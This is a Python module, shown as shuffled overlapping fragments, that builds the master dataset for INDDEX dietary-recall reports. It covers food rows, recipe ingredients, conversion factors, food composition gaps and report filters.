"EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter by owner if",
"self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description",
"\"foodrecall\" case. Every food they mention results in the creation of a \"food\"",
"amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val in [amount, portions,",
"child of this foodrecall. This dataset has a row for every food, with",
"None else: # If it's an indicator in the UCR that hasn't been",
"for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking",
"self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists",
"row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values()",
"a \"foodrecall\" case. Every food they mention results in the creation of a",
"nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def",
"IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR,",
"corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils",
"insert them from the master recipe nsr_cols = {col: master_recipe[col] for col in",
"if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code",
"for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and",
"= total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these",
"self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients'] if not master_recipe:",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8',",
"type is specified, show only rows with gaps of that type gap_type =",
"food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups:",
"the previously reported ingredients into the report for them. Components ---------- FoodData ::",
"FoodRow :: Class responsible for row-wise calculations and indicator definitions. \"\"\" import operator",
"recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] =",
"part of a recipe, or it wasn't found\"\"\" for raw_row in rows: row",
"Class responsible for row-wise calculations and indicator definitions. \"\"\" import operator import uuid",
"= group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from",
"INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS",
"fixture or from the parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug)",
"if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: #",
"yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values, insert",
"users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners",
"slugs) def _matches_in_memory_filters(self, row): # If a gap type is specified, show only",
"corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM,",
"= _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients:",
"nsr references are missing some values, insert them from the master recipe nsr_cols",
"interface to this dataset, it glues together all the component pieces and presents",
"recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction)",
"self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type",
"self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if",
"I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE),",
"FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See file docstring for more.\"\"\"",
"row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe =",
"[amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] =",
"and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used",
"nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator",
"be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR,",
"are entered as additional food cases and linked to the recipe by `recipe_case_id`.",
"**{k: [v for v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if",
"IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'),",
"self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code",
"that hasn't been explicitly set, check if it can # be pulled from",
"from the parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta:",
"filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in",
"I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5',",
"for group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients']",
"case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe):",
"self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code'",
"def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda: {",
"_insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows = []",
"recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions",
"calculations and indicator definitions. \"\"\" import operator import uuid from collections import defaultdict",
"# std recipe ingredients come from the DB, NOT ingredient cases ingredients =",
"self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor =",
"of these foods are recipes, and their ingredients appear as separate rows in",
"metadata about the recall session, calculated nutritional information, and auditing columns reporting on",
"tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags",
"for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type']",
"INDDEX reports Overview -------- Beneficiaries are asked about their diet in a \"recall\"",
"= self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition()",
"for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for",
"+ FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug in filter_selections: if",
"if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type =",
"from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES,",
"all(val is not None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount",
"report eating a nonstandard recipe more than once, in which case subsequent references",
"IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR,",
"for the INDDEX reports Overview -------- Beneficiaries are asked about their diet in",
"IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META),",
"pulled from the food fixture or from the parent food case's UCR if",
"wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount,",
"I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE),",
"missing some values, insert them from the master recipe nsr_cols = {col: master_recipe[col]",
"self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER",
"Get the food composition corresponding to food_code, fall back to base_term_food_code fct =",
"and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE",
"def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE",
"the primary dataset for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS =",
"def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return",
"name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name}",
"'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i",
"are asked about their diet in a \"recall\" session. This results in a",
"Some of these foods are recipes, and their ingredients appear as separate rows",
"the master dataset for the INDDEX reports Overview -------- Beneficiaries are asked about",
"IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags",
"row for every food, with metadata about the recall session, calculated nutritional information,",
"IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE),",
"if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code']",
"fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition",
"portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients):",
"for every food, with metadata about the recall session, calculated nutritional information, and",
"recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from the DB, NOT ingredient",
"else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe)",
"row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code",
"an indicator that hasn't been explicitly set, check if it can # be",
"row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True",
"if food_types and row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if",
"hasn't been explicitly set, check if it can # be pulled from the",
"None, 'references': [], 'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type'] in",
"IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3',",
"in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} )",
"if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from the DB, NOT",
"the recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients again. We need",
"self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code",
"with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and",
"# https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR,",
"and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code,",
"group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe,",
"I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6',",
"in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures = FixtureAccessor(domain)",
"return [] # don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain)",
"return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe, or",
"not None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions",
"need to insert duplicates of the previously reported ingredients into the report for",
"rows in the report. Standard recipes have their ingredients enumerated in the \"recipes\"",
"Every food they mention results in the creation of a \"food\" case that's",
"if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type ==",
"raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates the primary dataset",
"request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter by",
"if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type')",
"std recipe ingredients come from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe,",
"self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions",
"None if self._is_std_recipe_ingredient: # If it's an indicator that hasn't been explicitly set,",
"age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name):",
"\" \"calculated outside the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If",
"{} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients:",
"recall session. The ingredients of the recipe are entered as additional food cases",
"references = group['references'] ingredients = group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references +",
"return None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound:",
"corresponding to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code",
"None def _maybe_float(val): return float(val) if val not in (None, '') else None",
"If a gap type is specified, show only rows with gaps of that",
"If it's an indicator that hasn't been explicitly set, check if it can",
"eating a nonstandard recipe more than once, in which case subsequent references point",
"the logic to generate the master dataset for the INDDEX reports Overview --------",
"separate rows in the report. Standard recipes have their ingredients enumerated in the",
"a nonstandard recipe more than once, in which case subsequent references point to",
"= ingredient.ingr_fraction def _set_composition(self): # Get the food composition corresponding to food_code, fall",
"False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False",
"file contains the logic to generate the master dataset for the INDDEX reports",
"indicator in the UCR that hasn't been explicitly set, return that val return",
"row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values, insert them",
"= row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe",
"res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row",
"'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items()",
"# Get the food composition corresponding to food_code, fall back to base_term_food_code fct",
"IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements',",
"I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG =",
"I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i",
":: This is the interface to this dataset, it glues together all the",
"EMWF.show_project_data(slugs): return [] # don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive()",
"= {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking',",
"return self.ucr_row[indicator.slug] return None else: # If it's an indicator in the UCR",
"return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return",
"IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient',",
"master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients'] if not master_recipe: yield",
"IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META),",
"in the \"recipes\" lookup table. This dataset has additional rows inserted for each",
"I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE),",
"return res else: # NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid]",
"ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {}",
"table. This dataset has additional rows inserted for each ingredient. These rows are",
".domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a gap",
"for v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k !=",
"= 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values from the recipe",
"fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif",
"i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking',",
"for col in NSR_COLS_TO_COPY: # Copy these values from the recipe case setattr(row,",
"reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return float(val) if val not",
"self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code))",
"defined by the user and beneficiary during a recall session. The ingredients of",
"= defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], }) for row in",
"references are missing some values, insert them from the master recipe nsr_cols =",
"I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking',",
"in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code",
"for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else:",
"recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more than once,",
"IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR),",
"return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's",
"dataset for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code',",
"self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id']",
"https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META),",
"_multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total,",
"recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come",
"self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code",
"self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if",
"NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: #",
"of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code ==",
"slug in filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate),",
"else: # If it's an indicator in the UCR that hasn't been explicitly",
"recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows",
"and don't enumerate the ingredients again. We need to insert duplicates of the",
"or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and",
"rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients':",
"recipes, and their ingredients appear as separate rows in the report. Standard recipes",
"I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on',",
"= ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code,",
"IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR),",
"in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid",
"self.slug = slug tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture =",
"I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i",
"self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if",
"ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient)",
"FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug",
"again. We need to insert duplicates of the previously reported ingredients into the",
"NSR_COLS_TO_COPY: # Copy these values from the recipe case setattr(row, col, getattr(recipe, col))",
"enumerate the ingredients again. We need to insert duplicates of the previously reported",
"the report. Standard recipes have their ingredients enumerated in the \"recipes\" lookup table.",
"their ingredients enumerated in the \"recipes\" lookup table. This dataset has additional rows",
"getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name)",
"than once, in which case subsequent references point to the recipe definition with",
"def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures =",
"every food, with metadata about the recall session, calculated nutritional information, and auditing",
"NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions,",
"of the recipe are entered as additional food cases and linked to the",
"been explicitly set, check if it can # be pulled from the food",
"<= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return",
"for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These",
"_maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code",
"res = {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction)",
"the parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return",
"age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code:",
"return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {}",
"be pulled from the food fixture or from the parent food case's UCR",
"This dataset has a row for every food, with metadata about the recall",
"in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self,",
"a row for every food, with metadata about the recall session, calculated nutritional",
"self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap()",
"val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for",
